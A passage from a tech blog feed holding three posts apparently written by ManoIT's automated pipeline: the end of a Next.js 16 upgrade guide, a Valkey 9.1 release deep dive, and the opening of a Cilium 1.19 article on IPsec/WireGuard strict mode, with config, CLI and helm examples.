async function LivePrice({ id }: { id: string }) {
  const price = await getRealtimePrice(id);
  return <span>{price}</span>;
}

export default function Page() {
  return (
    <>
      <ProductHeader />
      <Suspense fallback={<PriceSkeleton />}>
        <LivePrice id="42" />
      </Suspense>
    </>
  );
}

As a bonus, when cacheComponents is on, client navigation preserves the previous route's state via React's <Activity>. Leaving a route sets it to "hidden" rather than unmounting, so going back restores scroll and input state. Effects are cleaned up when hidden and recreated when visible again.

3. Turbopack stable — default bundler + filesystem caching

Turbopack, the Rust-based bundler replacing Webpack, is stable in 16 for both dev and production builds and is now the default for new projects. During the beta, 50%+ of dev sessions and 20%+ of production builds on Next.js 15.3+ were already on Turbopack.

Metric	Improvement	Note
Production builds	2–5× faster	Zero-config default
Fast Refresh	up to 10× faster	Most noticeable on large apps
Dev startup (16.2)	~87% faster vs 16.1	Default app

If you have a custom Webpack setup, a flag keeps Webpack alive. For large monorepos, the beta filesystem caching persists compiler artifacts to disk across restarts for extra speed.

# Keep Webpack during the migration window
next dev --webpack
next build --webpack

// next.config.ts — dev filesystem caching (beta) for large apps
const nextConfig = {
  experimental: {
    turbopackFileSystemCacheForDev: true,
  },
};

export default nextConfig;

4. proxy.ts — the end of middleware.ts and a clearer network boundary

16 renames middleware.ts to proxy.ts. The API and matcher are identical; just rename the exported function to proxy. The reason is identity — this file is a request-time proxy intercepting requests in front of the cache, not just "auth middleware," and it runs on a single Node.js runtime. middleware.ts remains for Edge runtime use cases for now but is deprecated and slated for removal.

// proxy.ts (formerly middleware.ts) — runs on the Node.js runtime
import { NextRequest, NextResponse } from 'next/server';

export default function proxy(request: NextRequest) {
  return NextResponse.redirect(new URL('/home', request.url));
}

Migration is trivial: move middleware.ts → proxy.ts, rename the export to proxy, and the logic stays the same.

5. Improved caching APIs — revalidateTag, updateTag, refresh

To match the Cache Components model, cache invalidation is organized into three APIs. The point is to clearly pick "SWR, read-your-writes, or refresh-uncached-data" based on intent.

API	Use	Semantics
`revalidateTag(tag, profile)`	Invalidate tagged cache	SWR — serve stale immediately, revalidate in background
`updateTag(tag)`	Server Actions only	read-your-writes — fresh data within the same request
`refresh()`	Server Actions only	refresh uncached data only

The biggest change: revalidateTag now requires a cacheLife profile as the second argument (the single-argument form is deprecated). 'max' is recommended for most long-lived content.

import { revalidateTag } from 'next/cache';

// ✅ Built-in profile ('max' recommended — background revalidation)
revalidateTag('blog-posts', 'max');
revalidateTag('news-feed', 'hours');

// Inline object for custom expiry
revalidateTag('products', { expire: 3600 });

// ⚠️ Note: single-argument form is deprecated
// revalidateTag('blog-posts');

For "the user must see their own change instantly" cases — form/settings saves — use updateTag inside a Server Action. To refresh only uncached dynamic values like a notification count, use refresh.

'use server';
import { updateTag } from 'next/cache';

export async function updateUserProfile(userId: string, profile: Profile) {
  await db.users.update(userId, profile);
  // Expire + re-read immediately → user sees the change right away
  updateTag(`user-${userId}`);
}

6. React 19.2 + React Compiler — View Transitions, Activity, automatic memoization

16's App Router runs on the latest React Canary and includes React 19.2 features. Three you'll feel in production:

View Transitions animate elements that update inside a Transition or navigation. useEffectEvent extracts non-reactive logic out of Effects, easing dependency-array pain. Activity hides UI with display:none while preserving state and cleaning up Effects — the basis for the route-state preservation above.

On top of that, React Compiler 1.0 support is stable. Automatic memoization reduces unnecessary re-renders, sparing manual useMemo/useCallback, but it's not on by default (Babel dependency can lengthen builds, and data is still being gathered). Opt in:

// next.config.ts
const nextConfig = {
  reactCompiler: true, // stable but off by default — opt-in
};
export default nextConfig;

npm install babel-plugin-react-compiler@latest

7. Routing & navigation overhaul — layout dedup + incremental prefetch

16 fully rewrote routing/navigation. Two axes apply with no code changes.

Layout deduplication: when prefetching multiple URLs sharing a layout, the layout downloads once instead of per link. A page with 50 product links downloads the shared layout once, not 50 times, slashing transfer size.

Incremental prefetching: only the parts not already cached are prefetched, not whole pages. The prefetch cache cancels requests when a link leaves the viewport, prioritizes on hover/re-entry, and re-prefetches when data is invalidated. You may see more individual requests but far lower total transfer — the right trade-off for nearly all apps.

8. 16.1 & 16.2 — toward an AI-native framework

16.1 refined Cache Components and polished caching APIs and DX. Then 16.2 (March 18, 2026) made the direction explicit — "make the framework itself easy for AI coding agents to operate."

16.2 feature	Description	Effect
AGENTS.md by default	`create-next-app` ships version-matched docs to agents	100% internal eval pass (vs 79% skill-based)
Browser log forwarding	Client errors forwarded to the dev terminal by default	See client errors without switching to the console
Agent DevTools (experimental)	`next-browser` CLI exposes screenshots, network, console, component tree	LLM parses CLI output instead of a panel
Performance	~87% faster dev startup vs 16.1	Default app

Browser log forwarding level is configurable:

// next.config.ts
const nextConfig = {
  logging: {
    // 'error' (default) | 'warn' | 'verbose' | false
    browserToTerminal: 'warn',
  },
};
export default nextConfig;

The key insight: an LLM can't "read" a DevTools panel, but it can parse the text output of next-browser tree. Each command is a one-shot request against a persistent browser session, so agents can query the app repeatedly without managing browser state — which dovetails neatly with our CLAUDE.md token-optimization principles (structured input, result caching).

9. Migration decisions — breaking changes and flow

As a major release, 16 carries non-trivial compatibility changes. The most important:

Area	Change	Action
Runtime	Node.js 20.9+ / TypeScript 5.1+ required	Node 18 dropped — upgrade runtime first
Bundler	Turbopack default	Custom Webpack opts out via `--webpack`
Middleware	`middleware.ts` deprecated	Rename to `proxy.ts` + function name `proxy`
Cache	`revalidateTag` signature change	Add second arg: a `cacheLife` profile
Lint	`next lint` removed	Use Biome/ESLint directly — codemod provided
Images	`images.qualities` default `[75]`, `minimumCacheTTL` 4 hours	Re-verify quality/cache policy
Parallel routes	every slot requires `default.js`	Build fails without it — add `notFound()`/`null`
AMP	removed entirely	All AMP APIs (`useAmp`, etc.) deleted

Below is the upgrade decision flow our team uses.

flowchart TD
    A[Next.js 15 service] --> B{Node 20.9+/TS 5.1+?}
    B -->|No| C[Upgrade runtime first]
    C --> B
    B -->|Yes| D[codemod: npx @next/codemod upgrade latest]
    D --> E{Custom Webpack config?}
    E -->|Yes| F[Interim: keep --webpack + verify Turbopack gradually]
    E -->|No| G[Adopt Turbopack default]
    F --> H[Rename middleware.ts -> proxy.ts]
    G --> H
    H --> I[Add cacheLife profile to revalidateTag]
    I --> J{Redesign caching?}
    J -->|Yes| K[cacheComponents: true + adopt use cache gradually]
    J -->|No| L[Keep default dynamic model]
    K --> M[staging build/perf regression test]
    L --> M
    M --> N{Zero regressions?}
    N -->|No| O[Root-cause and fix]
    O --> M
    N -->|Yes| P[Gradual prod rollout + monitoring]

10. ManoIT internal adoption checklist

#	Task	Owner	Done criteria
1	Runtime audit — find Node 18 services, upgrade to 20.9+	Platform	All services Node 20.9+/TS 5.1+
2	Apply codemod on dev branch, confirm build passes	Frontend	`next build` succeeds
3	Bulk-rename `middleware.ts` → `proxy.ts` PR	Frontend	auth/redirect e2e passes
4	Add `cacheLife` profiles to `revalidateTag` callsites	Service owners	Zero deprecation warnings
5	Check parallel-route slots for missing `default.js`	Frontend	Zero build errors
6	Review image policy — `qualities`/`minimumCacheTTL` regressions	Frontend	Zero visual regressions on key screens
7	Baseline Turbopack build time & bundle size	Platform	Before/after build-time report
8	Caching-redesign PoC — `cacheComponents` + `use cache` on key pages	Frontend lead	TTFB / cache hit-rate measured
9	React Compiler opt-in A/B — build time vs runtime re-renders	Frontend	Adoption decision doc
10	Standardize 16.2 AGENTS.md + browser log forwarding	DX	Reflected in new-repo template
11	staging load/perf regression test (Lighthouse, k6)	QA	Zero Core Web Vitals regression
12	Gradual prod rollout (canary → all) + rollback rehearsal	Platform	Zero-downtime deploy + rollback verified

11. Conclusion — a major release that delivers "predictable caching and fast defaults"

In one line, Next.js 16 is "the release that strips away implicit magic — making caching explicit, the bundler fast, and middleware honest." Cache Components and use cache turn caching, once a debugging black box, into an opt-in model where the compiler manages keys. Making Turbopack the default brings build and Fast Refresh acceleration to everyone as a zero-config default. Renaming to proxy.ts looks small but fixes the mental model that "this file is the network boundary in front of the cache," and the revalidateTag/updateTag/refresh split cleanly separates SWR, read-your-writes, and uncached-refresh intents. 16.2's AI-native turn signals that the framework now treats coding agents as first-class users alongside humans.

Three things to remember operationally. (1) Upgrade the runtime first — with Node 18 dropped, the runtime is always the first gate of a 16 upgrade. (2) Treat caching redesign as a separate milestone — a plain migration (keeping the default dynamic model) and adopting cacheComponents are different jobs; don't mix them in one PR. (3) Measure build-output regressions for the Turbopack switch — most things are compatible, but builds depending on custom Webpack plugins should keep a --webpack safety net and verify gradually during the transition. The shortest one-line recommendation: "This sprint, run the codemod on a dev branch to get the build passing, then merge the proxy.ts rename and the revalidateTag profile additions first."

ⓘ This article was researched and written by ManoIT's automated blogging pipeline (Claude Opus 4.6 + Cowork Agent), analyzing the official Next.js 16 release blog (nextjs.org/blog/next-16, Oct 21 2025), the Next.js 16.2 AI Improvements blog (Mar 18 2026), the Next.js 16 upgrade guide, InfoQ's 16 release analysis, and LogRocket's 16 review as primary sources. API signatures, config options, performance figures, and flag names reflect the official docs as of the publish date (2026-05-30) and may change in later patches. Always verify against nextjs.org/docs and GitHub Releases before applying in production. Internal adoption examples are adapted from ManoIT's frontend team's operational procedures.

Originally published at ManoIT Tech Blog.

Valkey 9.1 Deep Dive — Database-Level ACLs, Lua-as-a-Module, and a New I/O Threading Model Hitting 2.1M RPS

daniel jeong — Fri, 29 May 2026 00:27:18 +0000

Valkey 9.1 Deep Dive — Database-Level ACLs, Lua-as-a-Module, and a New I/O Threading Model Hitting 2.1M RPS, Plus HGETDEL/MSETEX/CLUSTERSCAN Redefining the 2026 In-Memory Datastore Operations Standard

TL;DR

Valkey 9.1.0 (May 19, 2026) is the first minor release after the 9.0 GA, with 80+ contributors hardening security, observability, performance, efficiency, and tooling all at once.

Numbered database-level ACLs let you scope a user's permissions to specific databases (db=0,1), making single-cluster multi-tenant isolation practical.

Lua moved to a module (libvalkeylua.so) — pure cache workloads can drop Lua entirely and shrink the attack surface to zero.

A redesigned I/O threading model pushes a single server to 2.1M RPS (512-byte payloads, 9 IO threads, pipeline depth 10) and gives up to 17% more throughput.

New commands HGETDEL / MSETEX / CLUSTERSCAN, JSON logging (log-format json), main/IO thread usage metrics, and TLS auto-reload + SAN-URI mTLS round it out.

The Valkey community shipped Valkey 9.1.0 on May 19, 2026. Forked from Redis 7.4 under the Linux Foundation after the 2024 Redis license change (SSPL/RSALv2), Valkey crossed from "a Redis-compatible layer" into "a project with its own roadmap" at the 9.0 GA in October 2025. 9.1 builds on that foundation: 80+ contributors advanced security, observability, performance, efficiency, and tooling simultaneously. Compressed into one paragraph: (1) numbered database-level ACLs split per-tenant permissions at db granularity inside a single instance, (2) Lua scripting moved into its own module so you can turn it off entirely when unused, and (3) a new I/O threading model hit 2.1M RPS on a single server (512-byte payload, 9 IO threads, pipeline depth 10). Add (4) the HGETDEL/MSETEX/CLUSTERSCAN commands, (5) JSON logging plus main/IO thread usage metrics, and (6) TLS certificate auto-reload and SAN-URI mTLS. This article decomposes the root cause of each change from an operations standpoint, revisits the 9.0 foundation (Atomic Slot Migration, Hash Field Expiration, cluster-mode numbered DBs), and lays out the step-by-step upgrade, validation, and rollback playbook ManoIT applied to its internal cache/session clusters.

1. Why May 2026's Valkey 9.1 matters

Valkey's significance isn't a version number — it's the maturity 18 months after the fork. Right after the fork, the yardstick was "how Redis-compatible is it?" But once 9.0 added features not present in Redis OSS — Atomic Slot Migration, Hash Field Expiration, cluster-mode numbered DBs — the axis shifted to "the operational value of independent features." 9.1 continues that arc by concentrating on the two most operational areas: security and observability.

Date	Release / Event	Operational meaning
2024.03	Redis license change → Valkey fork (Redis 7.4 base)	BSD-3-Clause retained, Linux Foundation governance
2024.04	Valkey 8.0 — multithreaded I/O	Per-core throughput gains begin
2025.04	Valkey 8.1 — Vector Set, I/O improvements	Vector search / AI workload support
2025.10.21	Valkey 9.0 GA — Atomic Slot Migration, Hash Field Expiration, cluster numbered DBs, 1B RPS	Inflection beyond Redis compatibility
2026.05.19	Valkey 9.1.0 — DB-level ACLs, Lua-as-a-module, new I/O threading (2.1M RPS), HGETDEL/MSETEX/CLUSTERSCAN, JSON logging	Security/observability/efficiency become operational defaults

The two operational messages of 9.1: (1) you can solve multi-tenant isolation at db granularity without adding instances — DB-level ACLs directly cut the cost of instance separation; and (2) observability is now provided directly by the core, without a sidecar — JSON logging and thread usage metrics absorb gaps you previously filled with exporters and log parsers.

2. Security — Database-Level ACLs, Lua-as-a-Module, TLS Improvements

In-memory datastores traditionally said "we're fast, but security belongs upstream (app/network policy)." 9.1 re-locks that assumption at the core level.

2.1 Numbered database-level ACLs — the new multi-tenant isolation standard

Classic ACLs controlled which commands a user could run and which keys they could touch — but those rules applied to every database identically. Even if you split db 0 and db 5, permissions weren't split, so numbered DBs were hard to use as a multi-tenancy boundary. 9.1 adds a db= selector to scope a user's permissions to specific databases.

# Allow app-user only on db 0 and 1
> ACL SETUSER app-user on >secretpass +@all ~* db=0,1
OK

# After auth, db 0 works
> SELECT 0
OK
> SET mykey "hello"
OK

# db 2 is blocked
> SELECT 2
(error) NOPERM No permissions to access database

The operational payoff is large. The pattern of "one instance (or cluster) per tenant for isolation" can become per-tenant db + per-db ACL inside a single cluster when combined with 9.0's cluster-mode numbered DBs. Fewer instances → less memory overhead and operational burden. Caveat: numbered DBs are logical, not physical isolation, so for strongly regulated data (PII, payments) keep instance separation as well.

2.2 Lua scripting engine moved to a module — attack surface reduction

9.1 extracts the Lua scripting engine from the core server into its own module (libvalkeylua.so). Running arbitrary Lua via EVAL/EVALSHA is powerful but also a well-known attack vector (sandbox escape, resource exhaustion). The point of modularization is "don't load it if you don't need it." A pure cache workload with no scripting can drop the Lua module and reduce its attack surface to zero. Check which scripting engines are loaded via the new Scripting Engines section of INFO.

> INFO scripting_engines
# Scripting Engines
engine_lua:loaded=1,libname=libvalkeylua.so

2.3 TLS auto-reload and SAN-URI-based mTLS

9.1 directly tackles two chronic TLS operations pains — "an expired cert nobody noticed caused an outage" and "rotating certs requires a restart."

Improvement	Through 9.0	9.1
Cert expiry visibility	External monitoring only	`INFO` exposes TLS cert expiration dates
Cert rotation	Restart required (downtime)	Background auto-reload (zero downtime)
mTLS identity	CN-based	SAN-URI-based authentication

SAN-URI authentication integrates directly with workload-identity systems like SPIFFE/SPIRE, simplifying mTLS in service-mesh / zero-trust environments.

3. New Commands — HGETDEL / MSETEX / CLUSTERSCAN

9.1 absorbed "common patterns that used to need multiple round trips or a transaction" into single atomic commands.

3.1 HGETDEL — atomically get and delete hash fields

For queue patterns (read data and remove it immediately), you previously had to wrap HGET + HDEL in MULTI. HGETDEL does it in one shot.

> HSET job:42 status "pending" payload '{"action":"send_email"}' retries "3"
(integer) 3
> HGETDEL job:42 FIELDS 2 status payload
1) "pending"
2) "{\"action\":\"send_email\"}"
> HGETALL job:42
1) "retries"
2) "3"

3.2 MSETEX — set multiple keys with a shared TTL

Setting many keys with the same TTL used to require multiple SETEX calls or a SET+EXPIRE pipeline. MSETEX cuts round trips and supports idempotent sets via NX.

# Set 3 session keys, all expiring in 3600s
> MSETEX 3 session:abc "user:1" session:def "user:2" session:ghi "user:3" EX 3600
OK
> TTL session:abc
(integer) 3600

# NX: only set keys that don't already exist
> MSETEX 2 session:abc "user:99" session:xyz "user:4" NX EX 3600
OK
> GET session:abc
"user:1"

3.3 CLUSTERSCAN — cluster-wide key scanning

Iterating all keys in a cluster previously meant clients independently SCAN-ing each node and merging results. CLUSTERSCAN offers a single interface to traverse all nodes, with MATCH/TYPE/SLOT filters.

# Iterate all cluster keys (repeat until cursor returns 0)
> CLUSTERSCAN 0
1) "3"
2) 1) "user:1001"
   2) "user:1002"
   3) "session:abc"

# Filter by pattern
> CLUSTERSCAN 0 MATCH "session:*"
# Filter by type
> CLUSTERSCAN 0 TYPE hash
# Scan a specific slot
> CLUSTERSCAN 0 SLOT 7638

4. Performance — New I/O Threading Model Hits 2.1M RPS on a Single Server

9.1 pushes single-server throughput to 2.1M RPS under 512-byte payloads, 9 IO threads, pipeline depth 10. The core change is a redesigned inter-IO-thread communication model.

Improvement	Detail	Effect
New I/O threading model	Redesigned IO thread communication	Up to 17% higher throughput across workloads
Faster stream ops	`XRANGE`/`XREVRANGE` hot-path optimization	Up to 30% faster
Higher-throughput GETs	Raised string embedding size threshold	Up to 30% higher for string GET
Faster sorted-set queries	Skiplist query processing improvements	`ZRANGEBYSCORE`/`ZRANGEBYLEX` faster
Cached COMMAND responses	`COMMAND` responses are cached	Shorter client-init connection time
Hardware clock by default	Less time-syscall overhead	Up to 3% overall GET/SET improvement

Enabling the hardware clock by default looks minor but is global: it swaps the time lookup that every command makes from a syscall to a hardware counter. Validate monotonic-clock behavior on some virtualized/special environments before rolling out.

5. Efficiency — Memory Reduction and Rehashing / Bulk-Delete Optimization

As important as throughput is "the same data in less memory." 9.1 delivers meaningful savings on small strings and sorted sets.

Optimization	Target	Effect
String memory reduction	Strings < 128 bytes (internal pointer optimization)	Up to 20% less memory
Sorted-set memory reduction	Skiplist optimization	Up to 10% less memory
Rehashing performance	Internal hash-table rehashing on keyspace growth	Reduced latency impact during rehashing
Bulk delete	Pause resizing during `SREM`/`ZREM`/`HDEL`	Removes needless rehashing → faster bulk deletes
Replica creation	Reuse received RDB as AOF base when AOF enabled	No initial snapshot regeneration

"20% savings on sub-128-byte strings" is very tangible for services that store huge numbers of small strings — session tokens, flags, short cache values. A cache holding tens of millions of small keys cuts memory cost from the upgrade alone.

6. Observability — JSON Logging and Thread Usage Metrics

A long-standing Valkey/Redis ops weakness was "logs are human-readable plain text, awkward for observability tools to parse." 9.1 emits structured logs directly from the core via log-format json.

# valkey.conf
log-format json

Output is one JSON object per line — Loki/Elastic/CloudWatch can parse it immediately without custom grok patterns.

{"pid":14500,"role":"primary","timestamp":"14 May 2026 14:13:02.921","level":"notice","message":"oO0OoO0OoO0Oo Valkey is starting oO0OoO0OoO0Oo"}
{"pid":14500,"role":"primary","timestamp":"14 May 2026 14:13:02.928","level":"warning","message":"WARNING: The TCP backlog setting of 511 cannot be enforced..."}
{"pid":14500,"role":"primary","timestamp":"14 May 2026 14:13:02.930","level":"notice","message":"Ready to accept connections tcp"}

The other key item is main/IO thread usage metrics. Valkey's threads busy-loop while waiting for work, so CPU can appear near 100% even when relatively idle — plain CPU metrics couldn't reveal true load. 9.1 adds cumulative usage metrics for the main and IO threads so you can measure "how busy is it really?" and tune accordingly. It's a direct basis for deciding whether to add IO threads (scale up).

7. Revisiting the 9.0 Foundation — Atomic Slot Migration, Hash Field Expiration, Cluster Numbered DBs

To use 9.1 well you must know the 9.0 foundation beneath it. The three pillars of 9.0 (2025-10-21) tie straight into operational stability.

7.1 Atomic Slot Migration — from key-by-key to slot-by-slot

Pre-9.0 cluster resharding was key-by-key move-then-delete. If a client touched a key mid-migration, it didn't know which node held it, adding hops; in multi-key ops with keys split across two nodes, the client had to retry; and a huge collection key could exceed the target node's input buffer and block the migration outright. 9.0 atomically moves an entire slot (of 16,384) in AOF format. The source node keeps all keys until the slot migration fully completes, so redirects, retries, and giant-key blocking disappear structurally. 9.1's valkey-cli uses this directly via the --cluster-use-atomic-slot-migration flag on --cluster rebalance/--cluster reshard.

7.2 Hash Field Expiration — per-field TTL

Hashes bundle many fields under one key, but pre-9.0 expiry was all-or-nothing at the key level. Expiring only some fields required multi-key hacks, adding complexity and memory. 9.0 added a per-field TTL command family: HEXPIRE, HPEXPIRE, HTTL, HGETEX, HSETEX, HPERSIST, and more. Combined with 9.1's HGETDEL, hash-based job queues and session stores become far cleaner.

7.3 Other 9.0 improvements

9.0 also delivered: 1B RPS on a 2,000-node cluster (large-cluster resilience), pipeline memory prefetch (up to 40% throughput), zero-copy responses (up to 20%), Multipath TCP (up to 25% lower latency), SIMD for BITCOUNT and HyperLogLog (up to 200%), polygon-based geospatial queries, conditional delete DELIFEQ, CLIENT LIST filtering, and restored usage recommendations for 25 previously deprecated commands. If 9.0 was "a leap in performance and features," 9.1 is "the security/observability/efficiency finish on top."

8. Operational Decisions — Upgrade / Migration Flow

Below is the 9.1 adoption decision flow used by ManoIT's platform team.

flowchart TD
    A[Current in-memory store] --> B{Engine?}
    B -->|Redis 7.2 or older OSS| C[Evaluate drop-in migration<br/>to BSD-3 Valkey 9.1]
    B -->|Valkey 8.x| D[9.1 minor upgrade]
    B -->|Redis 7.4+ SSPL| E[Decide after license policy review]
    C --> F{Use scripting?}
    D --> F
    F -->|No| G[Don't load Lua module<br/>shrink attack surface]
    F -->|Yes| H[Keep Lua module loaded]
    G --> I{Multi-tenant?}
    H --> I
    I -->|Yes| J[Consolidate instances via<br/>numbered DBs + per-db ACLs]
    I -->|No| K[Single-db operation]
    J --> L[Wire JSON logging + thread metrics<br/>into observability pipeline]
    K --> L
    L --> M[Validate in staging 2 weeks → gradual prod rollout]

9. ManoIT Internal Adoption Checklist

The checklist below turns the above into an internal operations procedure. ManoIT runs cache/session/ranking clusters in three tiers (dev/stage/prod) and validates even minor releases for two weeks in staging before prod.

#	Item	Owner	Done criteria
1	Inventory engine/version across all clusters (incl. Redis/Valkey mix)	Platform	Version matrix PR
2	Audit Lua scripting usage — trace `EVAL`/`EVALSHA` calls	Service owners	Identify scripting-free clusters
3	Upgrade dev cluster to 9.1 (keep Lua loaded, default config)	Platform	`INFO server` = 9.1.0
4	Client compatibility regression in dev — verify new commands/response changes	Service owners	Client SDK compatibility report
5	Design numbered DBs + per-db ACLs on multi-tenant candidate clusters	Platform	Tenant↔db↔ACL mapping doc
6	Drop Lua module on scripting-free clusters	Platform + Security	`INFO scripting_engines` = empty
7	Enable JSON logging (`log-format json`) → wire to Loki	Observability	Structured log collection + dashboard
8	Expose main/IO thread usage metrics to Prometheus + alarms	Observability	IO-thread-saturation alarm fire/resolve test
9	Validate TLS auto-reload + cert-expiry metric, pilot SAN-URI mTLS	Security	Zero-downtime cert rotation verified
10	Staging 9.1 upgrade + load test (`valkey-benchmark --warmup --duration`)	Platform	Zero throughput/latency regression report
11	Standardize `--cluster-use-atomic-slot-migration` on resharding	Platform	Resharding runbook updated
12	Gradual prod upgrade (replica → primary, slot-level verification)	Platform	All prod nodes 9.1.0 + zero-downtime availability
13	Measure real memory savings post-upgrade (small-string / sorted-set heavy clusters)	Platform	Before/after `used_memory` comparison
14	Validate rollback — 8.x downgrade path when new 9.1 commands are unused	Platform	Rollback rehearsal passed

10. Conclusion — A Minor Release That Made Security, Observability, and Efficiency the Operational Default

Sum up 9.1 in one line: "on the performance/feature leap 9.0 laid down, it adds the most operational finish — security, observability, and efficiency." Numbered DB-level ACLs open a path to multi-tenant isolation at db granularity without adding instances; Lua-as-a-module applies the zero-trust principle "turn off what you don't use" at the core. The new I/O threading model hit 2.1M RPS on a single server, and 20% memory savings on small strings hit cache cost directly. JSON logging and thread usage metrics absorb the observability gap you previously filled with sidecars and exporters, while HGETDEL/MSETEX/CLUSTERSCAN collapse common patterns' round trips and transactions into single commands.

Three things to remember operationally. (1) Audit Lua usage first — dropping the module shrinks the attack surface, but a careless removal breaks features that relied on EVAL. (2) Remember numbered DBs are logical isolation — per-db ACLs are powerful but not physical isolation, so keep instance separation for regulated data. (3) Don't skip staging validation, even for a minor release — global-behavior changes like the hardware clock default and new I/O threading are included, so pre-validate on special virtualization environments. The shortest one-line recommendation in this article: "Upgrade dev to 9.1 this week, and start the security PR to drop the Lua module on your scripting-free clusters first."

ℹ️ This article was written by ManoIT's automated blogging pipeline (Claude Opus 4.6 + Cowork Agent), analyzing the official Valkey 9.1.0 release blog (valkey.io, May 19, 2026), the Valkey 9.0 GA blog (Oct 21, 2025), the Linux Foundation 9.1 release announcement (PRNewswire), Phoronix's 9.1 review, and the valkey-io/valkey GitHub release notes as primary sources. Command syntax, performance figures, and flag names reflect official docs as of publication (2026-05-29) and may change in future patches. Verify current status at valkey.io/commands and GitHub Releases before applying to production. The internal adoption example is adapted from ManoIT platform team's operational procedures.

Originally published at ManoIT Tech Blog.

Cilium 1.19 Deep Dive — 10-Year Anniversary: IPsec/WireGuard Strict Mode, Ztunnel Beta, Policy-Default-Local-Cluster, Multi-Pool IPAM Stable

daniel jeong — Thu, 28 May 2026 00:32:04 +0000

Cilium 1.19 Deep Dive — 10-Year Anniversary Release: IPsec/WireGuard Strict Mode, Ztunnel Transparent Encryption Beta, Policy-Default-Local-Cluster, Multi-Pool IPAM Stable, and Hubble Drop Tagging Redefining the 2026 eBPF Networking, Security, and Observability Standard

TL;DR

Cilium v1.19 (May 13, 2026) is the 10-year anniversary release and flips multiple defaults toward operational safety.

IPsec / WireGuard strict mode drops unencrypted traffic by default, ending best-effort encryption gaps.

ClusterMesh policy-default-local-cluster is now the default — audit your existing NetworkPolicies before upgrading or you will silently cut multi-cluster traffic.

Ztunnel Transparent Encryption (Beta) brings sidecarless workload-identity mTLS to Cilium, interoperable with Istio Ambient.

Multi-Pool IPAM graduates to Stable, Hubble adds drop policy tagging + encrypted-flow filters + Trace IP Options, and Network Policy denials can now return ICMPv4 Destination Unreachable to skip the 30-second TCP retry loop.

Cilium hit a clean ten years since its first commit, and v1.19 lands as the anniversary release. v1.19.0 dropped in mid-May 2026 and patches rolled to v1.19.4 within two weeks. There is no single flagship feature on the cover — instead, six axes evolve simultaneously to prove the promise of "an eBPF dataplane you can actually operate quarter after quarter." (1) Strict modes for IPsec and WireGuard turn node-to-node encryption from best-effort into a hard requirement. (2) Ztunnel Transparent Encryption lands as a beta integration, opening a sidecarless workload-identity encryption path next to the node-level encryption story. (3) ClusterMesh policy-default-local-cluster becomes the new default, structurally blocking the "I wrote a local policy that quietly fanned out across the mesh" class of incidents. (4) Multi-Pool IPAM graduates from Beta to Stable and now works with IPsec and direct routing. (5) Hubble adds drop event policy tagging, encrypted-flow filters, and Trace IP Options so "why was this packet dropped?" is answerable in one command. (6) Network Policy denials can now return ICMPv4 Destination Unreachable, ending the dumb 30-second TCP retry loop. This article decomposes the root cause of each of the six changes at the eBPF datapath / policy compilation / CRD schema level and lays out the nine-step upgrade, observation, and rollback playbook ManoIT applied across three internal Kubernetes clusters (prod / stage / dev).

1. Why May 2026's v1.19 is an inflection point for Cilium

Cilium started in April 2016 when Thomas Graf rewrote the Kubernetes dataplane in eBPF instead of iptables. v1.0 in 2018, CNCF Sandbox in 2019, Incubating in 2021, and Graduated in October 2023 — by now Cilium is the dataplane behind or recommended by GKE Dataplane v2, EKS Anywhere, OpenShift, Talos Linux, K3s, and most other major Kubernetes distributions. v1.19 is the inflection point where the 10-year anniversary symbolism meets a deliberate maintainer pivot: "operational safety nets become the default."

Date	Event	Operational meaning
2016.04	Cilium first commit (Thomas Graf)	eBPF-based K8s dataplane launches
2018.04	v1.0 — Production-ready	"L7 visibility + identity-based" model settles
2019.06	CNCF Sandbox accepted	Community governance stage 1
2021.10	CNCF Incubating	Hubble · ClusterMesh stabilization era
2023.10	CNCF Graduated	Enterprise adoption guidelines formalized
2024.04	v1.16 — Gateway API Beta, Multi-Pool IPAM Beta	Service mesh + multi-CIDR operations activated
2025.05	v1.17 — Gateway API GA, BGPv2 Stable	Accelerated Ingress NGINX retirement flow
2025.10	v1.18 — ClusterMesh API server v2, KVStoreMesh stable	Simplified large-scale multi-cluster control plane
2026.05.13	v1.19 — Strict Mode, Ztunnel Beta, policy-default-local-cluster, Multi-Pool IPAM Stable, Hubble drop tagging, ICMP friendly deny	Operational safety nets become the default
2026.05.27	v1.19.4 patch release	Rapid 0.x stabilization in progress

Two messages matter for operators. (1) "Default changes are the biggest changes." — ClusterMesh's policy-default-local-cluster flipping from false to true is not a feature addition; it is the default safety posture of multi-cluster policy flipping. (2) "Strict mode is the fastest path through a compliance audit." — Once IPsec or WireGuard is in strict mode, unencrypted traffic is dropped on the wire, so the "we encrypted, but some packets leaked in plaintext" audit finding disappears structurally.

2. IPsec/WireGuard Strict Mode — best-effort encryption becomes hard requirement

The longest section in the v1.19 release notes. Cilium's transparent encryption has supported IPsec since v1.4 and WireGuard since v1.10. But both modes were best-effort: "encrypt where we can, fall back to plaintext when peer keys aren't established or the protocol can't negotiate." That fallback was the most common finding in security audits.

2.1 Three gaps of the best-effort era

Scenario	v1.18 behavior	Audit verdict
New node joins cluster, key exchange still in progress	Plaintext until key negotiation completes, then encryption	"Plaintext window exists" finding
WireGuard peer key missing on a discovered node	Plaintext fallback	"Cannot enforce encryption" finding
IPsec XFRM policy partially expired (SPI rotation)	Plaintext fallback during renegotiation	"Plaintext traffic visible in audit log" finding

2.2 v1.19 fix — strict mode drops unencrypted traffic

v1.19 adds encryption.strictMode to both IPsec and WireGuard. With it enabled, the following behavior is enforced:

# helm/cilium-values.yaml — IPsec strict mode
# WARNING: Enable only after keys are distributed to every node.
# Partial rollout will drop plaintext and cut communication.
encryption:
  enabled: true
  type: ipsec
  ipsec:
    interface: ""
    keyFile: keys
    mountPath: /etc/ipsec
  strictMode:
    enabled: true                # v1.19 new — best-effort -> hard requirement
    cidr: "10.0.0.0/8"           # CIDR strict applies to (usually covers PodCIDR)
    allowRemoteNodeIdentities: false   # new nodes without keys are dropped immediately
nodeinit:
  enabled: true

# helm/cilium-values.yaml — WireGuard strict mode
encryption:
  enabled: true
  type: wireguard
  nodeEncryption: true
  wireguard:
    persistentKeepalive: "0s"
  strictMode:
    enabled: true                # v1.19 new
    cidr: "10.0.0.0/8"
    allowRemoteNodeIdentities: false

# Verify after applying
helm upgrade cilium cilium/cilium \
  --version 1.19.4 \
  --namespace kube-system \
  -f helm/cilium-values.yaml \
  --reuse-values

# Per-node strict status
kubectl -n kube-system exec -it ds/cilium -- cilium status --verbose | grep -A 3 Encryption
# Encryption:               Wireguard [strict]
# Strict mode CIDR:         10.0.0.0/8
# Allowed remote identities: 0
# Unencrypted drops (last 1m): 0

# Intentional plaintext blocking check
kubectl exec -it test-pod -- ping -c 3 unencrypted-peer-ip
